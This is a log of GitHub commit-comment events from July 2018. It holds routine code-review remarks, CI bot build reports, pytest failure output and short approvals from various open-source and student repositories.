{"id":"8030455680","type":"CommitCommentEvent","actor":{"login":"JonathanHaas"},"repo":{"name":"JonathanHaas/penn-today-ci"},"payload":{"comment":{"id":29863168,"position":null,"line":null,"path":null,"commit_id":"a6b791011e2d4f25e23d8956273ed9e1c81e7267","created_at":"2018-07-27T19:42:34Z","updated_at":"2018-07-27T19:42:34Z","author_association":"OWNER","body":"Created multidev environment [penn-today-ci#ci-1526](https://dashboard.pantheon.io/sites/4efb815f-6135-4a6f-97a8-9a974be0bd7a#ci-1526).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1526-penn-today-ci.pantheonsite.io/)"}},"created_at":"2018-07-27T19:42:34Z"}
{"id":"8030460260","type":"CommitCommentEvent","actor":{"login":"ikemanet"},"repo":{"name":"ikemanet/ikemanet.github.io"},"payload":{"comment":{"id":29863177,"position":null,"line":null,"path":null,"commit_id":"7c43627d2fc7a16730d5ed247a0efb5fc0f7df46","created_at":"2018-07-27T19:43:44Z","updated_at":"2018-07-27T19:43:44Z","author_association":"OWNER","body":"added CNAME"}},"created_at":"2018-07-27T19:43:44Z"}
{"id":"8030462407","type":"CommitCommentEvent","actor":{"login":"phucynwa"},"repo":{"name":"devtuananh/hotel-management"},"payload":{"comment":{"id":29863188,"position":29,"line":38,"path":"app/controllers/users_controller.rb","commit_id":"7f7c100931d5dad7cf995f5e383dbec0c52f7a53","created_at":"2018-07-27T19:44:17Z","updated_at":"2018-07-27T19:44:17Z","author_association":"NONE","body":"root_path"}},"created_at":"2018-07-27T19:44:17Z"}
{"id":"8030462481","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29863189,"position":null,"line":null,"path":null,"commit_id":"03fdd1b0d597613250c017996c8acfbacd22aa3c","created_at":"2018-07-27T19:44:18Z","updated_at":"2018-07-27T19:44:18Z","author_association":"OWNER","body":"Great to see `make test` being used.  Most of the tests pass on my computer, but a few fail.  Please take a quick look at the failed tests.  (I'll attach them.)  I only had a quick look, but it looks like the failed tests might be related to expected exceptions, or maybe  unintended exceptions?  If the exceptions are expected, I believe that pytest can test that the correct exception is raised, which cause the test case to pass.\r\n\r\nIf there is any work or discussion involved in sorting this out, please create an issue.\r\n\r\nOutput of make test:\r\n\r\n```pytest --cov\r\n============================= test session starts ==============================\r\nplatform darwin -- Python 3.6.4, pytest-3.4.0, py-1.5.2, pluggy-0.6.0\r\nrootdir: /Users/smiths/Repos/caseStudies/CaseStudies/glass/src/Python, inifile:\r\nplugins: cov-2.5.1\r\ncollected 26 items\r\n\r\nNewImplementation/test_All.py ....F...............FF....                 [100%]\r\n\r\n---------- coverage: platform darwin, python 3.6.4-final-0 -----------\r\nName                                Stmts   Miss  Cover\r\n-------------------------------------------------------\r\nNewImplementation/Constants.py         12      0   100%\r\nNewImplementation/ContoursADT.py       38      7    82%\r\nNewImplementation/Exceptions.py        30      7    77%\r\nNewImplementation/FunctADT.py          35      1    97%\r\nNewImplementation/GlassTypeADT.py      31      0   100%\r\nNewImplementation/Input.py             81     53    35%\r\nNewImplementation/SeqServices.py       17      0   100%\r\nNewImplementation/ThicknessADT.py      35      1    97%\r\nNewImplementation/test_All.py         245     57    77%\r\n-------------------------------------------------------\r\nTOTAL                                 524    126    76%\r\n\r\n\r\n=================================== FAILURES ===================================\r\n______________________________ TestAll.test_index ______________________________\r\n\r\n    @staticmethod\r\n    def test_index():\r\n        A = [1, 2, 3, 4, 5.5]\r\n        assert (index(A, 1) == 0) # x is present in list, checks \"=\" req\r\n>       assert (index(A, 5.5) == 3) # ensures that x < A[i+1]\r\nE       assert None == 3\r\nE        +  where None = index([1, 2, 3, 4, 5.5], 5.5)\r\n\r\nNewImplementation/test_All.py:67: AssertionError\r\n______________________ TestInput.test_load_params_default ______________________\r\n\r\nself = <test_All.TestInput object at 0x10bbf2240>\r\n\r\n    def test_load_params_default(self):\r\n        s = \"NewImplementation\\\\TestFiles\\\\defaultInputFile.txt\"\r\n        default = Input()\r\n>       default.load_params(s)\r\n\r\nNewImplementation/test_All.py:210: \r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ \r\n\r\nself = <Input.Input object at 0x10bbf2198>\r\ns = 'NewImplementation\\\\TestFiles\\\\defaultInputFile.txt'\r\n\r\n    def load_params ( self, s ):\r\n>       inputFile = open(s, \"r\")\r\nE       FileNotFoundError: [Errno 2] No such file or directory: 'NewImplementation\\\\TestFiles\\\\defaultInputFile.txt'\r\n\r\nNewImplementation/Input.py:38: FileNotFoundError\r\n_________________________ TestInput.test_verify_params _________________________\r\n\r\nself = <test_All.TestInput object at 0x10bcc6b00>\r\n\r\n    def test_verify_params(self):\r\n        path = \"NewImplementation\\\\TestFiles\\\\\"\r\n        init = Input()\r\n        with pytest.raises(ValueError):\r\n>           init.load_params(path+\"aNegative.txt\")\r\n\r\nNewImplementation/test_All.py:243: \r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ \r\n\r\nself = <Input.Input object at 0x10bcc6a90>\r\ns = 'NewImplementation\\\\TestFiles\\\\aNegative.txt'\r\n\r\n    def load_params ( self, s ):\r\n>       inputFile = open(s, \"r\")\r\nE       FileNotFoundError: [Errno 2] No such file or directory: 'NewImplementation\\\\TestFiles\\\\aNegative.txt'\r\n\r\nNewImplementation/Input.py:38: FileNotFoundError\r\n===================== 3 failed, 23 passed in 0.27 seconds ======================\r\n```"}},"created_at":"2018-07-27T19:44:18Z"}
{"id":"8030464963","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863196,"position":9,"line":9,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T19:44:54Z","updated_at":"2018-07-27T19:44:54Z","author_association":"NONE","body":"Этот метод нам не нужен. Мы можем вернуть все поезда за счет ридера `:trains`. Он прочитает содержимое инстанс переменной `@trains`, что и так вернет нам коллекцию всех поездов на станции. (Это я говорю с учетом предыдущих коментов по переименованию методов)"}},"created_at":"2018-07-27T19:44:54Z"}
{"id":"8030468660","type":"CommitCommentEvent","actor":{"login":"somnath03"},"repo":{"name":"somnath03/hello-universe"},"payload":{"comment":{"id":29863205,"position":null,"line":null,"path":null,"commit_id":"9abdf6990bbb3761862a0ea75e59a057e8864130","created_at":"2018-07-27T19:45:45Z","updated_at":"2018-07-27T19:45:45Z","author_association":"OWNER","body":"Content for non-telrpathicc human"}},"created_at":"2018-07-27T19:45:45Z"}
{"id":"8030469422","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"rurban/smhasher"},"payload":{"comment":{"id":29863207,"position":null,"line":null,"path":null,"commit_id":"bde0208400a24461e4ac7923dae01c7f9b6dc373","created_at":"2018-07-27T19:45:57Z","updated_at":"2018-07-27T19:45:57Z","author_association":"CONTRIBUTOR","body":"I should clarify.\r\n\r\nFarmhash internally choice the implementation depending on CPU features that advertised by GCC's defines. Each such implementation produces different result for the same input. Therefore, each function from farmhash family should be splitted into 4-5 entries of the hashes table.\r\n\r\nIMHO this is wrong approach. In [HashContest](https://github.com/leo-yuriev/HashContest) I will build all hashes, but enable only suitable for detected at runtime CPU features.\r\n\r\nRegards."}},"created_at":"2018-07-27T19:45:57Z"}
{"id":"8030471078","type":"CommitCommentEvent","actor":{"login":"MartinBrude"},"repo":{"name":"laueressea/Calculator"},"payload":{"comment":{"id":29863214,"position":31,"line":36,"path":"js/calcucode.js","commit_id":"2892d21663dc870ddbbe7e5f0cc16fd5e0549559","created_at":"2018-07-27T19:46:21Z","updated_at":"2018-07-27T19:46:21Z","author_association":"NONE","body":"delete whitespace before first \""}},"created_at":"2018-07-27T19:46:21Z"}
{"id":"8030478599","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863229,"position":12,"line":12,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T19:48:10Z","updated_at":"2018-07-27T19:48:10Z","author_association":"NONE","body":"А вот тут мы бы хотели передавать аргументом тип поезда, который нужно вывести. В теле метода нужно будет только убрать 1 строку с дупликацией и изменить строку с типом поезда на то, что пришло в аргументе. И лучше сделать это без putsов. Путсы у нас зайдут в клиентский код, который мы будем писать в следующем уроке."}},"created_at":"2018-07-27T19:48:10Z"}
{"id":"8030482209","type":"CommitCommentEvent","actor":{"login":"rmukras"},"repo":{"name":"rmukras/qurbani"},"payload":{"comment":{"id":29863241,"position":null,"line":null,"path":null,"commit_id":"c72a6c3110cece36afa4eee341ff5946ef320f59","created_at":"2018-07-27T19:49:01Z","updated_at":"2018-07-27T19:49:01Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add image to angular qurbani](https://trello.com/c/DQvaNcMO/10-add-image-to-angular-qurbani)"}},"created_at":"2018-07-27T19:49:01Z"}
{"id":"8030486638","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863252,"position":15,"line":15,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T19:50:05Z","updated_at":"2018-07-27T19:50:05Z","author_association":"NONE","body":"Отсутствуют пункты ТЗ\r\n1. Может принимать поезда (по одному за раз)\r\n2. Может отправлять поезда (по одному за раз, при этом, поезд удаляется из списка поездов, находящихся на станции).\r\n\r\nЭто 2 метода, которые будут добавлять поезд в массив `@trains` и удалять его оттуда"}},"created_at":"2018-07-27T19:50:05Z"}
{"id":"8030490700","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29863260,"position":null,"line":null,"path":null,"commit_id":"872b6dfbe45b1ca1159f961e226248ddb0560263","created_at":"2018-07-27T19:51:00Z","updated_at":"2018-07-27T19:51:00Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1016](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1016).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1016-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T19:51:00Z"}
{"id":"8030493452","type":"CommitCommentEvent","actor":{"login":"elwazana"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29863264,"position":null,"line":null,"path":null,"commit_id":"03fdd1b0d597613250c017996c8acfbacd22aa3c","created_at":"2018-07-27T19:51:42Z","updated_at":"2018-07-27T19:51:42Z","author_association":"COLLABORATOR","body":"@smiths Hello Dr. Smith, that is an issue we have been trying to figure out for the past week. @samm82  and @niazim3 tests pass, except for the first `AssertionError`, however, mine has been failing with the exact same errors as you just got. \r\n\r\nWe aren't sure why this is happening, but @szymczdm believes it has something to do with the configuration of python/pytest. "}},"created_at":"2018-07-27T19:51:42Z"}
{"id":"8030499982","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863276,"position":19,"line":19,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T19:53:15Z","updated_at":"2018-07-27T19:53:15Z","author_association":"NONE","body":"Есть маршрут. Это класс. И у этого маршрута есть станции. Нужен 1 ридер - `:stations`"}},"created_at":"2018-07-27T19:53:15Z"}
{"id":"8030501821","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29863291,"position":null,"line":null,"path":null,"commit_id":"d7a105bd0db5f06130040363e15ad5ba456cb8b0","created_at":"2018-07-27T19:53:41Z","updated_at":"2018-07-27T19:53:41Z","author_association":"COLLABORATOR","body":"- [ ] data definitions need labels; current generation of empty label from https://github.com/JacquesCarette/Drasil/blob/d7a105bd0db5f06130040363e15ad5ba456cb8b0/code/drasil-docLang/Drasil/DocumentLanguage/Definitions.hs#L48-L54"}},"created_at":"2018-07-27T19:53:41Z"}
{"id":"8030504445","type":"CommitCommentEvent","actor":{"login":"nppatel4"},"repo":{"name":"nppatel4/mentor-tree"},"payload":{"comment":{"id":29863298,"position":null,"line":null,"path":null,"commit_id":"a7205aa13c88c6c980840e385bf8dfce4d021342","created_at":"2018-07-27T19:54:20Z","updated_at":"2018-07-27T19:54:20Z","author_association":"OWNER","body":"🥇 "}},"created_at":"2018-07-27T19:54:20Z"}
{"id":"8030506276","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29863303,"position":null,"line":null,"path":null,"commit_id":"29b06dadea6b4d11da57ada8fa1e112a9d681fbf","created_at":"2018-07-27T19:54:48Z","updated_at":"2018-07-27T19:54:48Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-555](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-555).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-555-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-27T19:54:48Z"}
{"id":"8030506656","type":"CommitCommentEvent","actor":{"login":"liliul"},"repo":{"name":"liliul/primeiro-git-hub"},"payload":{"comment":{"id":29863304,"position":null,"line":null,"path":null,"commit_id":"507bf42979b51235dd5614dfad7f37c409d12978","created_at":"2018-07-27T19:54:53Z","updated_at":"2018-07-27T19:54:53Z","author_association":"OWNER","body":"testando\r\n"}},"created_at":"2018-07-27T19:54:53Z"}
{"id":"8030509908","type":"CommitCommentEvent","actor":{"login":"LiviuIonescu"},"repo":{"name":"LiviuIonescu/JavascriptLearning"},"payload":{"comment":{"id":29863312,"position":null,"line":null,"path":null,"commit_id":"3abaa0f99e300207d696a9340db003e60c87c6fe","created_at":"2018-07-27T19:55:41Z","updated_at":"2018-07-27T19:55:41Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-27T19:55:41Z"}
{"id":"8030511553","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29863317,"position":null,"line":null,"path":null,"commit_id":"be848eff013c959e0eefed9511197efc2da77d27","created_at":"2018-07-27T19:56:06Z","updated_at":"2018-07-27T19:56:06Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - i386-Windows-7-VisualStudio-14: OK (2956 of 2956 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T19:56:06Z"}
{"id":"8030513142","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29863324,"position":22,"line":22,"path":"Part_4/Railway.rb","commit_id":"347859dad01d1e6919e3fd686f76bab58ad0ca56","created_at":"2018-07-27T19:56:29Z","updated_at":"2018-07-27T19:56:29Z","author_association":"NONE","body":"22 строка верная, только переменную нужно переименовать, что-б точней отразить содержание. (как переименовать я уже написал выше). А вот 21 строку следует удалить. Нельзя удалять первую и последние станции, а в остальном это такие-же станции как и все остальные и незачем их отделять."}},"created_at":"2018-07-27T19:56:29Z"}
{"id":"8030513921","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29863326,"position":null,"line":null,"path":null,"commit_id":"529a5b76ccf440d13e09bc12d2b7abbb9c30d851","created_at":"2018-07-27T19:56:40Z","updated_at":"2018-07-27T19:56:40Z","author_association":"NONE","body":"Ok, but lets make that lambda be provided for the constructor of the\ncache, not on every remove.\n\nOn 27/07/18 17:46, Krzysztof Szenk wrote:\n> Lambdas turn into some anonymous types (and putting captures into\n> members, yes).\n> And so if lambda captures by reference, then passing lambda nothing more\n> than copying a pointer (or a few if there's more in capture list)\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Crisspl/IrrlichtBAW/commit/529a5b76ccf440d13e09bc12d2b7abbb9c30d851#commitcomment-29861011>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGky8fVRtY59Nw85t1vY_WmrPFiydWMmks5uK0PtgaJpZM4VjorN>.\n> \n"}},"created_at":"2018-07-27T19:56:40Z"}
{"id":"8030515740","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29863329,"position":null,"line":null,"path":null,"commit_id":"3ec78468453dc4433f4684d59594f780420cfa8a","created_at":"2018-07-27T19:57:09Z","updated_at":"2018-07-27T19:57:09Z","author_association":"NONE","body":"LTC test here: http://tests.stockfishchess.org/tests/view/5b5b78f20ebc5902bdb8ece5"}},"created_at":"2018-07-27T19:57:09Z"}
{"id":"8030516130","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29863331,"position":7,"line":13,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T19:57:15Z","updated_at":"2018-07-27T19:57:15Z","author_association":"NONE","body":"перефразируя ваш же вопрос могу спросить: \"а где сказано, что маршрут должен состоять из названий станций?\"\r\nно это все словесная эквилибристика, она нас далеко не уведет в изучении материала\r\n\r\nпо сути же могу пояснить следующее:\r\nТЗ специально сформулированы в \"приближенной к реальности форме\", чтобы студенты привыкали к тому, что задачи, если это не задачка из учебника для совсем начинающих, не будут сформулированы предельно строго, с массой оговорок\r\nформулировка реальных задач всегда подразумевает, что разработчик знает основные \"правила игры\" и всегда готов уточнить задачу там, где сомневается\r\nв ООП классы между собой связываются по объектам, поэтому ТЗ нужно читать и понимать именно с этой точки зрения\r\nнет ничего страшного в том, что у вас нет этого \"взаимодействия по объектам\" в вашем первоначальном варианте, нужно просто понять эту логику и следовать ей (конечно же так функционирует не в 100% случаев, но общая тенденция именно такая)"}},"created_at":"2018-07-27T19:57:15Z"}
{"id":"8030519942","type":"CommitCommentEvent","actor":{"login":"ahankinson"},"repo":{"name":"DDMAL/diva.js"},"payload":{"comment":{"id":29863335,"position":2,"line":2,"path":"source/js/plugins/metadata.js","commit_id":"0b55642cfcacdf3b6b5c730a8d93ac07c5c1a849","created_at":"2018-07-27T19:58:13Z","updated_at":"2018-07-27T19:58:13Z","author_association":"MEMBER","body":"This comment doesn't need to be replicated to every plugin."}},"created_at":"2018-07-27T19:58:13Z"}
{"id":"8026125818","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29852746,"position":null,"line":null,"path":null,"commit_id":"59ea6ca48c7ba5202ee14daa752709e02e5edbe1","created_at":"2018-07-27T02:00:12Z","updated_at":"2018-07-27T02:00:12Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2955 of 2988 tests passed, 175 test warnings)\n\nMessages:\n\n * 176 tests had: ESO small diffs.\n * 132 tests had: MTR small diffs.\n * 167 tests had: EIO diffs.\n * 104 tests had: Table small diffs.\n * 26 tests had: ESO big diffs.\n * 22 tests had: MTR big diffs.\n * 28 tests had: Table big diffs.\n * 7 tests had: ERR diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 649\n * Failed: 4\n\nregression Test Summary\n * Passed: 615\n * Failed: 29\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-27T02:00:12Z"}
{"id":"8026132678","type":"CommitCommentEvent","actor":{"login":"riverdjsl"},"repo":{"name":"riverdjsl/shape_finding"},"payload":{"comment":{"id":29852759,"position":4,"line":4,"path":"input.txt","commit_id":"8f921a78309ac24ead48dd2af9243b6b70d5cd9c","created_at":"2018-07-27T02:02:47Z","updated_at":"2018-07-27T02:02:47Z","author_association":"OWNER","body":"柱脚横坐标，力1~力4横坐标，力纵坐标（先设4个力高度相同，后期有需要可以改）"}},"created_at":"2018-07-27T02:02:47Z"}
{"id":"8026132830","type":"CommitCommentEvent","actor":{"login":"hangttt2"},"repo":{"name":"EvolableAsiaDevelopment/Developer-Day-Landing-Page"},"payload":{"comment":{"id":29852760,"position":25,"line":22,"path":"source/scss/blocks/banner.scss","commit_id":"d31c96aab3167e628785015a6e9930107a92ef07","created_at":"2018-07-27T02:02:50Z","updated_at":"2018-07-27T02:02:50Z","author_association":"CONTRIBUTOR","body":"`/contain` ? Bé có nhầm hem?"}},"created_at":"2018-07-27T02:02:50Z"}
{"id":"8026134290","type":"CommitCommentEvent","actor":{"login":"jbrock1981"},"repo":{"name":"jbrock1981/Lambda-Hello"},"payload":{"comment":{"id":29852763,"position":null,"line":null,"path":null,"commit_id":"df23b498672fc4aad291199b2017cd7942cba566","created_at":"2018-07-27T02:03:24Z","updated_at":"2018-07-27T02:03:24Z","author_association":"OWNER","body":"@fireinjun Extra Credit Challenge"}},"created_at":"2018-07-27T02:03:24Z"}
{"id":"8026135122","type":"CommitCommentEvent","actor":{"login":"yjqiang"},"repo":{"name":"yjqiang/bilibili-live-tools"},"payload":{"comment":{"id":29852766,"position":null,"line":null,"path":null,"commit_id":"63f5c691eb962670ff3025fff32ea0c9da98574e","created_at":"2018-07-27T02:03:45Z","updated_at":"2018-07-27T02:03:45Z","author_association":"OWNER","body":"#73 "}},"created_at":"2018-07-27T02:03:45Z"}
{"id":"8026135767","type":"CommitCommentEvent","actor":{"login":"riverdjsl"},"repo":{"name":"riverdjsl/shape_finding"},"payload":{"comment":{"id":29852767,"position":5,"line":5,"path":"input.txt","commit_id":"8f921a78309ac24ead48dd2af9243b6b70d5cd9c","created_at":"2018-07-27T02:04:00Z","updated_at":"2018-07-27T02:04:00Z","author_association":"OWNER","body":"**力可以取0，实现4-2-1 ，3-2-1，2-1多种树形柱的找形**"}},"created_at":"2018-07-27T02:04:00Z"}
{"id":"8026137497","type":"CommitCommentEvent","actor":{"login":"riverdjsl"},"repo":{"name":"riverdjsl/shape_finding"},"payload":{"comment":{"id":29852769,"position":7,"line":7,"path":"input.txt","commit_id":"8f921a78309ac24ead48dd2af9243b6b70d5cd9c","created_at":"2018-07-27T02:04:43Z","updated_at":"2018-07-27T02:04:43Z","author_association":"OWNER","body":"平面内计算长度系数，平面外计算长度系数"}},"created_at":"2018-07-27T02:04:43Z"}
{"id":"8026138488","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29852772,"position":null,"line":null,"path":null,"commit_id":"59ea6ca48c7ba5202ee14daa752709e02e5edbe1","created_at":"2018-07-27T02:05:09Z","updated_at":"2018-07-27T02:05:09Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-27T02:05:09Z"}
{"id":"8026138573","type":"CommitCommentEvent","actor":{"login":"dbyard-vmware"},"repo":{"name":"jmoroski/vcd-ext-sdk-1"},"payload":{"comment":{"id":29852773,"position":22,"line":22,"path":"ui/api-client/packages/sdk/src/core/plugin.module.ts","commit_id":"9494303ea085a6dc7f2457572b980eabcabc0ce5","created_at":"2018-07-27T02:05:11Z","updated_at":"2018-07-27T02:05:11Z","author_association":"NONE","body":"I think the TranslationService could provide prepareTranslations() and getBestMatchSupportedLanguage() - or something wrapping it.  A TranslationServiceConfigurer maybe?"}},"created_at":"2018-07-27T02:05:11Z"}
{"id":"8026144753","type":"CommitCommentEvent","actor":{"login":"FndNur1Labs"},"repo":{"name":"cryptonotefoundation/cryptonote"},"payload":{"comment":{"id":29852785,"position":null,"line":null,"path":null,"commit_id":"17a0574197f1914b2d736b0308d8275ae4d963c2","created_at":"2018-07-27T02:07:41Z","updated_at":"2018-07-27T02:07:41Z","author_association":"NONE","body":"2018-Jul-27 10:54:29.762469 ERROR   Error: wallet failed to connect to daemon (http://localhost:9095).\r\n"}},"created_at":"2018-07-27T02:07:41Z"}
{"id":"8026146022","type":"CommitCommentEvent","actor":{"login":"nzrnshah"},"repo":{"name":"nzrnshah/mytestproject"},"payload":{"comment":{"id":29852787,"position":null,"line":null,"path":null,"commit_id":"04aefb0db44ff15006231702af950a8224aa97cb","created_at":"2018-07-27T02:08:10Z","updated_at":"2018-07-27T02:08:10Z","author_association":"OWNER","body":"This changes is accepted"}},"created_at":"2018-07-27T02:08:10Z"}
{"id":"8026152136","type":"CommitCommentEvent","actor":{"login":"andcastillo"},"repo":{"name":"mljs/simple-clustering"},"payload":{"comment":{"id":29852791,"position":null,"line":null,"path":null,"commit_id":"c0a0720f1fb18d4d876c0383344caea1f4734ea3","created_at":"2018-07-27T02:10:38Z","updated_at":"2018-07-27T02:10:38Z","author_association":"COLLABORATOR","body":"lgtm"}},"created_at":"2018-07-27T02:10:38Z"}
{"id":"8026154427","type":"CommitCommentEvent","actor":{"login":"xinbenlv"},"repo":{"name":"xinbenlv/eip-1202-draft"},"payload":{"comment":{"id":29852794,"position":null,"line":null,"path":null,"commit_id":"5ca0679ccd0f69c77641a45f22c669b4987dfab6","created_at":"2018-07-27T02:11:34Z","updated_at":"2018-07-27T02:11:34Z","author_association":"OWNER","body":"Since meeting notes will be pretty long, can we put it in a,separate file? (a subfolder under the same repo)"}},"created_at":"2018-07-27T02:11:34Z"}
{"id":"8026154862","type":"CommitCommentEvent","actor":{"login":"dbyard-vmware"},"repo":{"name":"jmoroski/vcd-ext-sdk-1"},"payload":{"comment":{"id":29852796,"position":18,"line":18,"path":"ui/api-client/packages/sdk/src/i18n/translation.loader.ts","commit_id":"9494303ea085a6dc7f2457572b980eabcabc0ce5","created_at":"2018-07-27T02:11:45Z","updated_at":"2018-07-27T02:11:45Z","author_association":"NONE","body":"I don't think the catchError will handle an error for the observable returned by the first call.  I think you might need tp do two catchErrors in a row.  That way you don't need to reassign currentLanguage"}},"created_at":"2018-07-27T02:11:45Z"}
{"id":"8026162169","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29852805,"position":null,"line":null,"path":null,"commit_id":"0adc5f0fa851f13666165cca38429af8003273c2","created_at":"2018-07-27T02:14:43Z","updated_at":"2018-07-27T02:14:43Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [jfussionfo](https://jfussionfo-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/modules-plugins-known-issues](https://jfussionfo-static-docs.pantheonsite.io/docs/modules-plugins-known-issues)\n"}},"created_at":"2018-07-27T02:14:43Z"}
{"id":"8026162590","type":"CommitCommentEvent","actor":{"login":"dbyard-vmware"},"repo":{"name":"jmoroski/vcd-ext-sdk-1"},"payload":{"comment":{"id":29852809,"position":54,"line":54,"path":"ui/api-client/packages/sdk/src/i18n/translate.service.ts","commit_id":"9494303ea085a6dc7f2457572b980eabcabc0ce5","created_at":"2018-07-27T02:14:54Z","updated_at":"2018-07-27T02:14:54Z","author_association":"NONE","body":"I think you're trying to do a loading signal?  I'm not sure.  I am a little confused about the flow, but I think you could get away with a single BehaviourSubject<Translations> and assume that it having null value is the loading state."}},"created_at":"2018-07-27T02:14:54Z"}
{"id":"8026163023","type":"CommitCommentEvent","actor":{"login":"Chocobo1"},"repo":{"name":"arvidn/libtorrent"},"payload":{"comment":{"id":29852812,"position":null,"line":null,"path":null,"commit_id":"2f56fa6c3e0d29d9afd68a7437a02b950033d67b","created_at":"2018-07-27T02:15:04Z","updated_at":"2018-07-27T02:15:04Z","author_association":"CONTRIBUTOR","body":"Pardon, is it released? because I didn't see it on https://github.com/arvidn/libtorrent/releases"}},"created_at":"2018-07-27T02:15:04Z"}
